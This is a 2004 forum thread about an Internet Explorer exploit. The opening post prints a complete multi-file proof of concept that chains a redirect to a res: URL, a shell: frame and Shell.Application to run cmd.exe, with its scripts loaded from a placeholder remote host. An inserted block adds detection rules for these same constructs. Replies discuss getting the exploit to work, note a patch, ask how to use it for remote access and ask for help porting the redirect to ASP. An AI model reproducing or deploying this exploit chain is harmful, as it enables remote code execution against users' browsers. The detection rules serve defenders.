Forums: Microsoft Internet Explorer Remote Application.she - Forums

Microsoft Internet Explorer Remote Application.she

#1 User is offline   TheOther 

  • Private First Class
  • Group: Members
  • Posts: 98
  • Joined: 01-December 03

Posted 09 July 2004 - 04:27 AM

From K-Otik:

Proof of Concept Exploit by Jelmer
Solution : The IEFix.reg registry file will protect you from this new variant/exploit

http://www.k-otik.co...072004IEfix.reg


----------------------------------------------------- installer.htm -------------------------------------------------------
<html>
<body>

<script language="Javascript">

function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-10000\;dialogHeight:1\;dialogWidth:1\;").location="vb script:\"<script SRC='http://ip/shellscript_loader.js'><\/script>\"";
}

</script>

<script language="javascript">

setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.jsp" style=display:none;></IFRAME>');

</script>

</body>
</html>

--------------------------------------------------------- md.htm ---------------------------------------------------------
<script language="javascript">

window.returnValue = window.dialogArguments;

function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}

CheckStatus();

</SCRIPT>

--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<script SRC='http://ip/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c pause");</script>');
}
document.write('<iframe src="shell:WINDOWS\\Web\\TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);

--------------------------------------------------------- redir.jsp ----------------------------------------------------------
<% Thread.sleep(1500);
response.setStatus(302);
response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm");
%>
0
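
For defenders, the constructs visible in the files posted above (a 302 whose Location uses a non-HTTP scheme, a frame sourced from shell:, Shell.Application instantiation, an off-screen modal dialog, execScript into a frame) can be matched at a proxy or in a content scanner. This is an added example, not part of the original post or the K-Otik code; the rule ids, the response object shape and the sample inputs are constructed for illustration.

```javascript
// Added example: static checks for constructs that appear in the PoC files above.
// Rule ids and the { status, headers, body } shape are assumptions of this sketch.
const RULES = [
  { id: 'local-scheme-frame',        // frame/iframe whose src is shell: or res:
    re: /<i?frame[^>]*\bsrc\s*=\s*["']?\s*(?:url:)?(?:shell|res):/i },
  { id: 'shell-application',         // ActiveXObject("Shell.Application")
    re: /ActiveXObject\s*\(\s*["']Shell\.Application["']\s*\)/i },
  { id: 'offscreen-modal',           // showModalDialog placed at negative coordinates
    re: /showModalDialog\s*\([^)]*dialog(?:Top|Left)\s*:\s*-\d+/i },
  { id: 'cross-frame-execscript',    // someFrame.execScript(...)
    re: /\b\w+\.execScript\s*\(/i },
];

// The Location value in redir.jsp carries a "URL:" prefix before the scheme,
// so strip it before comparing. Returns null for a relative redirect.
function redirectScheme(location) {
  const m = /^\s*(?:url:)?\s*([a-z][a-z0-9+.-]*):/i.exec(location || '');
  return m ? m[1].toLowerCase() : null;
}

function scanResponse(res) {
  const findings = [];
  const status = res.status || 0;
  const loc = (res.headers || {}).location;
  if (status >= 300 && status < 400 && loc) {
    const scheme = redirectScheme(loc);
    // A web server has no reason to redirect a browser to res:, shell:, file:, etc.
    if (scheme && scheme !== 'http' && scheme !== 'https') {
      findings.push(`redirect-to-${scheme}`);
    }
  }
  for (const rule of RULES) {
    if (rule.re.test(res.body || '')) findings.push(rule.id);
  }
  return findings;
}

// Constructed sample responses; the strings are fragments of the files posted above.
const SAMPLES = {
  redirect: { status: 302, headers: { location: 'URL:res://shdoclc.dll/HTTP_501.htm' }, body: '' },
  script: { status: 200, headers: {}, body:
    'document.write(\'<iframe src="shell:WINDOWS\\\\Web\\\\TIP.HTM"></iframe>\');' +
    'var obj=new ActiveXObject("Shell.Application");' },
  benign: { status: 302, headers: { location: 'https://example.test/login' },
    body: '<iframe src="https://example.test/ad.html"></iframe>' },
};

for (const [name, sample] of Object.entries(SAMPLES)) {
  console.log(name, scanResponse(sample));
}
```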

#2 User is offline   myth 

  • Master Sergeant
  • Group: Members
  • Posts: 408
  • Joined: 09-January 04

Posted 09 July 2004 - 05:48 AM

heh

many of us probably already have this via the mailing list, however, I haven't managed to get a working version of it


I've tried via IIS6 (highly untweaked) and via our hosting (also highly untweaked). If any of you have managed to get a working version of this, please either tell me you haven't done anything and it just worked, or tell me if there were any tweaks you made to get it to work....

I've made the project via Macromedia, getting errors for the function called on installer.htm ... and a couple of other errors... any more info would be great. Other than that, all my other systems under my command are gonna get that reg file in a few days
0

#3 User is offline   BeNiNuK 

  • Private First Class
  • Group: Members
  • Posts: 135
  • Joined: 28-September 03

Posted 09 July 2004 - 07:49 AM

posted 3 times :S
0

#4 User is offline   som3aa 

  • Private First Class
  • Group: Members
  • Posts: 62
  • Joined: 03-March 04

Posted 09 July 2004 - 11:03 AM

http://www.microsoft.com/downloads/details.aspx?FamilyId=4D056748-C538-46F6-B7C8-2FBFD0D237E3&displaylang=en


Download the patch from here for Windows 2000, Windows NT, Windows Server 2003, Windows XP ;)
0

#5 User is offline   n0vun 

  • Private First Class
  • Group: Members
  • Posts: 36
  • Joined: 14-August 03

Posted 09 July 2004 - 07:12 PM

som3aa, on Jul 9 2004, 07:03 PM, said:

http://www.microsoft.com/downloads/details.aspx?FamilyId=4D056748-C538-46F6-B7C8-2FBFD0D237E3&displaylang=en


Download the patch from here for Windows 2000, Windows NT, Windows Server 2003, Windows XP ;)

That patch is for the ADODB.Stream version of this exploit, not for the updated one. ;)
0

#6 User is offline   som3aa 

  • Private First Class
  • Group: Members
  • Posts: 62
  • Joined: 03-March 04

Posted 10 July 2004 - 05:57 AM

small question please
how could this be used to get remote access of other computers?
0

#7 User is offline   setthesun 

  • Master Sergeant
  • Group: Specialist
  • Posts: 574
  • Joined: 13-February 04

Posted 12 July 2004 - 02:53 AM

Can anyone here convert this into ASP or PHP?

What am I missing while converting it to ASP?

'wait 1.5 seconds

Response.Redirect "URL:res://shdoclc.dll/HTTP_501.htm"

setthesun me = new setthesun();
0
